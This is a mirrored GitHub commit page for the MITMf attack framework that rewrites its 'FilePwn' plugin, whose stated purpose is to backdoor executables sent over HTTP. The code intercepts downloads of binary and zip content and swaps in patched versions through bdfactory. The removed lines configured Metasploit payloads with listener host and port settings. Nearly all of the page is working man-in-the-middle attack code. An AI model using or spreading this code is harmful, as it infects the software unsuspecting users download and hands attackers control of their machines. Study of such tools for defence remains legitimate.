mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 05:22:15 -07:00
filepwn test plugin
This commit is contained in:
byt3bl33d3r
parent
90c5b8ac95
commit
17478c17b6
2 changed files with 42 additions and 51 deletions
|
|
@ -1,37 +1,3 @@
|
||||||
[Overall]
|
|
||||||
transparentProxy = True # Must for transparent proxy
|
|
||||||
MaxSizeFileRequested = 100000000 # will send a 502 request of large content to the client (server error)
|
|
||||||
certLocation = ~/.mitmproxy/mitmproxy-ca.pem
|
|
||||||
proxyPort = 8080
|
|
||||||
sslports = 443, 8443
|
|
||||||
loglevel = INFO
|
|
||||||
logname = proxy.log
|
|
||||||
resourceScript = bdfproxy_msf_resource.rc
|
|
||||||
|
|
||||||
|
|
||||||
[hosts]
|
|
||||||
#whitelist host/IP - patch these only.
|
|
||||||
#ALL is everything, use the blacklist to leave certain hosts/IPs out
|
|
||||||
|
|
||||||
whitelist = ALL
|
|
||||||
|
|
||||||
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
|
|
||||||
|
|
||||||
blacklist = , # a comma is null do not leave blank
|
|
||||||
|
|
||||||
|
|
||||||
[keywords]
|
|
||||||
#These checks look at the path of a url for keywords
|
|
||||||
|
|
||||||
whitelist = ALL
|
|
||||||
|
|
||||||
#For blacklist note binaries that you do not want to touch at all
|
|
||||||
|
|
||||||
# Also applied in zip files
|
|
||||||
|
|
||||||
blacklist = Tcpview.exe, skype.exe, .dll
|
|
||||||
|
|
||||||
|
|
||||||
[ZIP]
|
[ZIP]
|
||||||
# patchCount is the max number of files to patch in a zip file
|
# patchCount is the max number of files to patch in a zip file
|
||||||
# After the max is reached it will bypass the rest of the files
|
# After the max is reached it will bypass the rest of the files
|
||||||
|
|
|
||||||
|
|
@ -1,6 +1,21 @@
|
||||||
import os,subprocess,logging,time
|
################################################################################################
|
||||||
from bdfproxy.bdf_proxy import *
|
# 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
|
||||||
exe_mimetypes = ['application/octet-stream', 'application/x-msdownload', 'application/exe', 'application/x-exe', 'application/dos-exe', 'vms/exe', 'application/x-winexe', 'application/msdos-windows', 'application/x-msdos-program']
|
#
|
||||||
|
# This is just a test to see if i can actually implement it correctly!! NOT THE FINAL VERSION!!!!
|
||||||
|
#################################################################################################
|
||||||
|
|
||||||
|
import sys, os
|
||||||
|
import pefile
|
||||||
|
import zipfile
|
||||||
|
from bdfactory import pebin, elfbin
|
||||||
|
from tempfile import mkstemp
|
||||||
|
|
||||||
|
|
||||||
|
# for now lets not read from a config file
|
||||||
|
#try:
|
||||||
|
#from configobj import ConfigObj
|
||||||
|
#except:
|
||||||
|
#sys.exit('[-] configobj not installed!')
|
||||||
|
|
||||||
class FilePwn(Plugin):
|
class FilePwn(Plugin):
|
||||||
name = "FilePwn"
|
name = "FilePwn"
|
||||||
|
|
@ -8,17 +23,21 @@ class FilePwn(Plugin):
|
||||||
implements = ["handleResponse"]
|
implements = ["handleResponse"]
|
||||||
has_opts = True
|
has_opts = True
|
||||||
log_level = logging.DEBUG
|
log_level = logging.DEBUG
|
||||||
desc = "Backdoor executables being sent over http using bdfproxy"
|
desc = "Backdoor executables being sent over http using bdfactory (STILL WORK IN PROGRESS!!)"
|
||||||
|
|
||||||
def initialize(self,options):
|
def initialize(self,options):
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
|
|
||||||
|
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
|
||||||
|
'application/x-msdos-program', 'binary/octet-stream']
|
||||||
|
#FOR FUTURE USE
|
||||||
|
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
||||||
|
|
||||||
|
#USED NOW
|
||||||
|
self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||||
|
|
||||||
self.options = options
|
self.options = options
|
||||||
self.msf_file_payload_opts = "LHOST=%s LPORT=%s" % \
|
#userConfig = ConfigObj('bdfproxy.cfg')
|
||||||
(options.msf_lhost,options.msf_file_lport)
|
|
||||||
self.payloads = {}
|
|
||||||
self._make_files()
|
|
||||||
if options.launch_msf_listener and options.msf_rc == "/tmp/tmp.rc":
|
|
||||||
self._start_msf()
|
|
||||||
|
|
||||||
def binaryGrinder(self, binaryFile):
|
def binaryGrinder(self, binaryFile):
|
||||||
"""
|
"""
|
||||||
|
|
@ -230,13 +249,19 @@ class FilePwn(Plugin):
|
||||||
return aZipFile
|
return aZipFile
|
||||||
|
|
||||||
def handleResponse(self,request,data):
|
def handleResponse(self,request,data):
|
||||||
#print "http://" + request.client.getRequestHostname() + request.uri
|
|
||||||
ch = request.client.headers['Content-Type']
|
content_header = request.client.headers['Content-Type']
|
||||||
#print ch
|
|
||||||
if ch in self.payloads:
|
if content_header in self.binaryMimeTypes:
|
||||||
print "Replaced file of mimtype %s with malicious version" % ch
|
orig_binary = request.content.read()
|
||||||
data = self.payloads[ch]
|
bd_binary = self.binaryGrinder(orig_binary)
|
||||||
return {'request':request,'data':data}
|
return {'request':request,'data':bd_binary}
|
||||||
|
|
||||||
|
elif content_header in self.zipMimeTypes:
|
||||||
|
orig_zipfile = request.content.read()
|
||||||
|
bd_zip = self.zip_files(orig_zipfile)
|
||||||
|
return {'request':request,'data':bd_zip}
|
||||||
|
|
||||||
else:
|
else:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue